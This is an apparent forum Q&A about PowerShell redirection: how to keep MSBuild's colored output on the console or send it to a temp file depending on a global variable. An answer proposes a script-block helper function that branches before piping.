        $global:Redirection = 'TempFile'
        Clean-Sln c:\temp\Another.sln

    If I use 'Console', the cmdlet/function Redirect-AccordingToRedirectionVariable should output the MSBuild messages with colors, the same way as if the output were not piped. In other words, it should leave the output as it is. If I use 'TempFile', Redirect-AccordingToRedirectionVariable will store the output in a temp file. Is it even possible? I guess it is not :| Or do you have any advice on how to achieve the goal? A possible solution:

        if ($Redirection -eq 'Console') {
            MSBuild.exe $sln /target:Clean | Redirect-AccordingToRedirectionVariable
        } else {
            MSBuild.exe $sln /target:Clean | Out-File c:\temp.txt
        }

    But if you imagine there can be many, many msbuild calls, it's not ideal. Don't be shy to tell me any new suggestion for how to cope with it ;) Any background info about redirection/coloring/output is welcome as well. (The problem is not msbuild-specific; it touches any application that writes colored output.)
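    One way to avoid duplicating every MSBuild call is to pass the command as a script block and branch once inside a helper - a sketch (Invoke-WithRedirection is a made-up name). The key point is that in the 'Console' branch the native exe is not piped at all, so it keeps writing its colors straight to the console:

        function Invoke-WithRedirection {
            param([scriptblock]$Command)
            if ($global:Redirection -eq 'Console') {
                & $Command                                   # not piped: colors reach the console untouched
            } else {
                & $Command | Out-File -Append c:\temp.txt    # piped: captured as plain text, colors lost
            }
        }

        function Clean-Sln {
            param($sln)
            Invoke-WithRedirection { MSBuild.exe $sln /target:Clean }
        }

    Once output from a native application goes through a pipe it arrives as plain strings, so the colors cannot be preserved on the file path - branching before piping appears to be the only way to keep them on the console path.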

    Read the article

< Previous Page | 89 90 91 92 93 94 95 96 97 98 99 100  | Next Page >